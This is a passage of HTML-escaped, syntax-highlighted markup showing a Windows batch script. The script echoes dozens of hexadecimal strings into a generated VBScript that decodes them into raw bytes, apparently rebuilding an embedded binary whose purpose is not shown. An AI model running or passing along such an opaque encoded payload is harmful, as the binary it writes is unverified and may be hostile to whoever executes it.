-moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;&lt;a href="http://www.ss64.com/nt/for.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;For&lt;/span&gt;&lt;/a&gt; &lt;span style="color: rgb(51, 204, 51);"&gt;%%&lt;/span&gt;&lt;span style="color: rgb(68, 136, 136);"&gt;b&lt;/span&gt; &lt;a href="http://www.ss64.com/nt/in.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;In&lt;/span&gt;&lt;/a&gt; &lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"A7E8E3DB6F143DFB7ABAFF4DABDE9B45857D664F2CD68DEF0E8D7F84050FE134CA20F0"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"5734270550975E7356D17C4B001EC790F17FE8C1584BA268F9891E22C1131078CA215A"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"AD93B152EB0F1E253DF30025450B7AC256EF211893C1AD4398FC04503826BA418C02C7"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"CDCAA63B95FDC2317474395DBF0664CD2CE2EB1A94B15B80E0102E1C8351351DD0CEDD"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"38D890EF66FBDEA2C78174FDF1BA41378B1B63816E08A0870F75F4E112469031A00101"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"247B83049F690E36E9FA880C59D96FDF8F0772CC12E27FDCE3279012FE3D9054F09222"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"33E8F302CF57231C4E91F8040345CC2A31F04670634D7A60229F08185A505999DEDA01"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"B265045CF9C69B6854A16EA4683FB417CF3B00CE5CF160FC3E58558D43EE5239451C18"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"4D65A1CF047FE204804F73C52DE7DBE9AE0BAEC114CD8186AC2009DD1E0B6C0839C2CF"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"D3C93D8120A0EA46394063F70DF3398CA229B27AF81051CF0CE80952ECC021455C8DFC"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"C91BC57366265CBDD71BF84DA0A2443768A4FE2B832CC78C8D9E9918C419EAFA15F7C7"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"E096D2F357C793B6716D13555C11A0B72E12AF45FA465460A8332250D62C40DD9E1E5A"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"A954B46CC748AA785068D545014EAA3657E320F049F19BB6C238E46910FE0476E2A20B"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"E4DFEFF38617052812ADB982DE848B11E05A8874E40112AAC2E115CCCCF389DDDD2C8B"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"9BE978428C79D8D47397FF0A5A0BBAB204F5F34A08680EE098063C6A166505A20EF1AB"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"7CE37E48D55E84C1C407817142686264F32E68CC57A8C6948F4BA651C79684A0ED204A"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"3BF1C71ABA4675F4D2F7AEFDD215DE534BB28BB83D251BE5F7C9E9963AFFED856B6F61"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"FDF302D64BAFD9A664EA2FE9E4A05909534D3312C204F1D66E417890BA0FB9CD079810"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"8B7B0A219E9B5E9042F641CC46BC1000593CB4E699F0828C9961E1F0FCDABFC1107A8B"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"6C321E2D03AFE72ADA82089EFB026A8DFCEFAE606CB9767CE55F361A63239782F5C036"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"E138DDD1F50B35A5D0EB38CA144EC6243E32029DB405546908B059A2B7280101FE479E"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"6E0B319F20BB8E8E3AD851E81A9CE09CA2786D9B5B0BC21CDBD2A4158F4E0688CF5F76"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"B050BE5B4B0FE94AE8436CC9E82D662DC5F99441380182CB6C40A1B580BDB46E46CEDC"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"CB8BE7C904361C1A50BB3AE54BD1AEB6E607E90D5639BFE0BC6857E57EAE450A48D6A2"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"D66592124B272C2C3DEF02CFC2D51E40171DD8F2DDE818C17A578E22C309EFF1CE315A"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"DC473D95404FBC1D070501712C335DF3E188BCFBC8D853895A5E27D37430DD2E19E87E"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"B9C1DDA854DC5708D5AD9B325A0BDE41D3928727804EC11CA16C899A8C08BED14D6D6A"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"CB295CA13771059D9CF363D0618A9677B1A25CAA68D94733600AF6D08C5CD182313277"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"A6E90B7CDD41D5C6BD177690BD812BE8C6111E150F29D67ACFD7A25FC2B5C7E1E952D5"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"21EEA3B0234CB06BEBE150D646F361E083AA8B8798756EB0A4C75487A06A22572C73A9"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt; &lt;a href="http://www.ss64.com/nt/do.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;Do&lt;/span&gt;&lt;/a&gt; &gt;&gt;t.vbs &lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;&lt;a href="http://www.ss64.com/nt/echo.html"&gt;&lt;span style="color: rgb(177, 177, 0); font-weight: bold;"&gt;Echo&lt;/span&gt;&lt;/a&gt;.&lt;a href="http://www.ss64.com/nt/for.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;For&lt;/span&gt;&lt;/a&gt; b=1To 69Step 2:o.Write Chr&lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;Clng&lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;"&amp;amp;H"^&amp;amp;Mid&lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;&lt;span style="color: rgb(51, 204, 51);"&gt;%%&lt;/span&gt;&lt;span style="color: rgb(68, 136, 136);"&gt;b&lt;/span&gt;,b,W^&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;^&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;^&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;:Next&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;&lt;a href="http://www.ss64.com/nt/for.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;For&lt;/span&gt;&lt;/a&gt; &lt;span style="color: rgb(51, 204, 51);"&gt;%%&lt;/span&gt;&lt;span style="color: rgb(68, 136, 136);"&gt;b&lt;/span&gt; &lt;a href="http://www.ss64.com/nt/in.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;In&lt;/span&gt;&lt;/a&gt; &lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"057639B74AE99E0455FB9860555B58279BC9151CA60C4F014EFF948DCF85E350C85587"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"404943ABC5DC19D717122F3693D4CBFB583957D08F87735C83018EB4F184B5077D10AE"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"A00F1A7589BD0F71C7102D2181BF47411FA91FE4DA5D5D01148D20F5F25E660FE2A268"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"398D5A6CEB6909FB82EBABE8B03E76279EF580468A96FDF44E7F80FDDF7A76D3B97BBB"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"8B0E8917672CDE096B0CEF6663A18C16E270DB018BF8049C33F5B51C058E799B490083"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"494212FF45B8E824CCC78DFAD58883E2FE68B4255F45ABDA3C59AEAD83E05B29B062EB"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"106117039FDD05439E45084221E271E12A1DAB4F10C7FA028BBABEA6AF04E15B210CF8"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"7E1497FBFA2E22E8949C4EE9EAD083B151DCBBF727BA05B4B6BC0C9DBB116BFA1AB416"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"ADE973F8B07C63CF9370692D22E5594422CD16D345BFE4AB63206DCFF65F91AEDEB927"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"CF1BC4D300274BF993E741EE3F2BED04D1EF7337F60AC700194D077BC328C13FC6BBCF"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"225E3D55418418399B5C7389CB96814150346704E1690F4573325CB9FCF9DC3299EB72"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"28B74589FB7FF9116E5D37979F0092C3E5CF853CB38EEECADECE75B8BA94AAA361FBD9"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"12F52A19F3ABE167D9200AB3E8215699C513091AB2F647D085D600FEB55EEA277B46D4"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"5A8868B48FF1DF9D01CAD073A6C77A401B11FA6C7532D71147570D8EA1ECF92DD66F89"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"254C98EBF2042698CB8F0507AB350714DE04C5FD77239CD8964FF341D6E963B09588DE"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"122A8C456079ADA1FC4B3D34D49831C20F8314FD5751C27BF2B11068E9A79AA81F7C36"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"AE139C9591C673E8696C9F80DBF0803C1A56DC90EF36F015D4ED66D7801BC8C4FB53E2"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: 